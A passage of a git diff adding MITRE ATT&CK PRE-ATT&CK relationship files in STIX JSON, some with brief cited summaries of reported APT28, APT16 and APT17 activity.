"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "type": "relationship", + "modified": "2019-08-20T13:08:13.437Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e.json new file mode 100644 index 0000000000000000000000000000000000000000..2708f8a1112d15510e5cc4f7eb80566b5de747ed --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0de0e5f2-1b9e-4fb5-9fe5-a3ca0d063314", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) registered domains imitating NATO, OSCE security websites, Caucasus information resources and other organizations.(Citation: FireEye APT28) (Citation: US District Court Indictment GRU Oct 2018)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "type": "relationship", + "modified": "2020-10-01T18:55:39.213Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267.json new file mode 100644 index 0000000000000000000000000000000000000000..0250bf90e48f71ffd1c64743ebba609d7320fd41 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--115fed95-f51e-4678-b3eb-0a1694f89b2d", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "relationship_type": "related-to", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751.json new file mode 100644 index 0000000000000000000000000000000000000000..e1c4d425bab3cf98eda62f3568fd3cbbac5668fe --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--50096c80-ec20-49dc-8a60-499ea7940a82", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--432c700b-4bf3-4824-a530-a6e86882c4b7.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--432c700b-4bf3-4824-a530-a6e86882c4b7.json new file mode 100644 index 0000000000000000000000000000000000000000..2f53b552848bb5a06338ea86d1f81671c0158fe9 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--432c700b-4bf3-4824-a530-a6e86882c4b7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--62501eca-1a48-48bd-a431-9373747b9f03", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--432c700b-4bf3-4824-a530-a6e86882c4b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "relationship_type": "related-to", + "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb.json new file mode 100644 index 0000000000000000000000000000000000000000..ee6717d19efa94d553fb7087452c7207deaa90d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--38d6e407-87ef-48a4-bc25-a41e4a828d97", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359.json new file mode 100644 index 0000000000000000000000000000000000000000..c17c340333509264fc781fcf9f1836b023cf8d28 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9ff5827d-1410-4915-a260-b8a39f24191a", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "relationship_type": "related-to", + "target_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2.json new file mode 100644 index 0000000000000000000000000000000000000000..764e9efdd585d23cf2c9efeaf53aba7e3aa28c2f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--bd9b6ab1-a075-4c35-b4eb-59850aaccd00", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT16](https://attack.mitre.org/groups/G0023) spearphished journalists, apparently targeting those interested in contact information for DPP members or politicians.(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "source_name": "FireEye EPS Awakens Part 2" + } + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "relationship_type": "uses", + "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "type": "relationship", + "modified": "2019-03-22T14:20:45.708Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--51c20b46-16cc-4b58-80d7-89d48b14b064.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--51c20b46-16cc-4b58-80d7-89d48b14b064.json new file mode 100644 index 0000000000000000000000000000000000000000..fbd6b5cf7d3cf5fb4b247407b8dcc8a69c5b5028 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--51c20b46-16cc-4b58-80d7-89d48b14b064.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--13ecbda5-a07c-4e48-9bf1-c352c118d4a1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--51c20b46-16cc-4b58-80d7-89d48b14b064", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--545cd36e-572e-413d-82b9-db65788791f9.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--545cd36e-572e-413d-82b9-db65788791f9.json new file mode 100644 index 0000000000000000000000000000000000000000..136b16a6aaa73693efe592159d2d6a2a37a4f512 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--545cd36e-572e-413d-82b9-db65788791f9.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--e148d25d-bb33-4b08-a99f-4c041af90e36", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--545cd36e-572e-413d-82b9-db65788791f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) posted in forum threads and created profile pages in Microsoft TechNet.(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "type": "relationship", + "modified": "2019-03-22T14:21:19.554Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a.json new file mode 100644 index 0000000000000000000000000000000000000000..739b90e56fe9c08e93e0f6c81364a9d2301b89b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7d9abb86-1029-4863-a4a2-c4f15e7ba943", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "relationship_type": "related-to", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4.json new file mode 100644 index 0000000000000000000000000000000000000000..2097e0f2b84feb964c7cc6cc714c4444917764e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3eaa25d4-a22a-4f39-9d34-1c0a84e71fde", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--614f64d8-c221-4789-b1e1-787e9326a37b.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--614f64d8-c221-4789-b1e1-787e9326a37b.json new file mode 100644 index 0000000000000000000000000000000000000000..81e17eaa5997684bb6e06ceae0b6c7e79be7fc56 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--614f64d8-c221-4789-b1e1-787e9326a37b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--d71fb584-82fa-4199-8c92-26b9d716d70c", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--614f64d8-c221-4789-b1e1-787e9326a37b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) created biographical sections on TechNet profile pages to appear more legitimate.(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "type": "relationship", + "modified": "2019-03-22T14:21:19.541Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a.json new file mode 100644 index 0000000000000000000000000000000000000000..8be337872e225fc35ff94dcd94e0c55f43419a2c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8f7330f4-8e0b-4522-976e-c779679b54e1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f.json new file mode 100644 index 0000000000000000000000000000000000000000..b12046758978c0b985b7e12e9bd869fcfd5ba3aa --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a868bb1d-8e7f-4144-85f2-e3632c7bf14f", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0.json new file mode 100644 index 0000000000000000000000000000000000000000..894fc8ac8e1ac8c315de280aff151ba7d4ba64eb --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5423cec2-8100-4e22-9462-466fd75100fb", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d.json new file mode 100644 index 0000000000000000000000000000000000000000..33c15edcaf23656984746056d41135728a7fc960 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--af10d58e-73ca-4b30-894c-ecdedab11e19", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) reused the SOURFACE downloader as the payload of a lure document.(Citation: FireEye APT28)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-09-09T17:44:35.673Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--715a66b4-7925-40b4-868a-e47aba879f8b.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--715a66b4-7925-40b4-868a-e47aba879f8b.json new file mode 100644 index 0000000000000000000000000000000000000000..119adac9889908574fdb3b7f1e97d6fd51814a95 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--715a66b4-7925-40b4-868a-e47aba879f8b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a1c998fd-8acb-4b54-a036-a573b3484ae1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--715a66b4-7925-40b4-868a-e47aba879f8b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003.json new file mode 100644 index 0000000000000000000000000000000000000000..375db38fc522e05cf92bd490a2bcd0ab38514ed1 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3127f2b7-fa31-44ab-9212-790409a84a48", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3.json new file mode 100644 index 0000000000000000000000000000000000000000..7efd132085f61058d59819216917d3b00eb1c403 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4683a37a-76e2-4e23-ab96-678a967ef2e6", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d.json new file mode 100644 index 0000000000000000000000000000000000000000..48ccf67569431f49d35e92883dd0ee31d87d3b25 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f36a1dce-c607-442a-a9b0-aee0b57bf5ad", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "target_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "relationship_type": "related-to", + "id": "relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d", + "type": "relationship", + "modified": "2019-02-19T18:56:56.770Z", + "created": "2019-02-19T18:56:56.770Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--87239038-7693-49b3-b595-b828cc2be1ba.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--87239038-7693-49b3-b595-b828cc2be1ba.json new file mode 100644 index 0000000000000000000000000000000000000000..6a764345c536e47d4f2223c0c2260e59bf889c12 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--87239038-7693-49b3-b595-b828cc2be1ba.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--926ab8e9-ff9d-4b85-9f5f-7ef3f3d9d5df", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--87239038-7693-49b3-b595-b828cc2be1ba", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33", + "relationship_type": "related-to", + "target_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8.json new file mode 100644 index 0000000000000000000000000000000000000000..54d9a1f249613255fba18190e88ad5987f9f9c1a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": 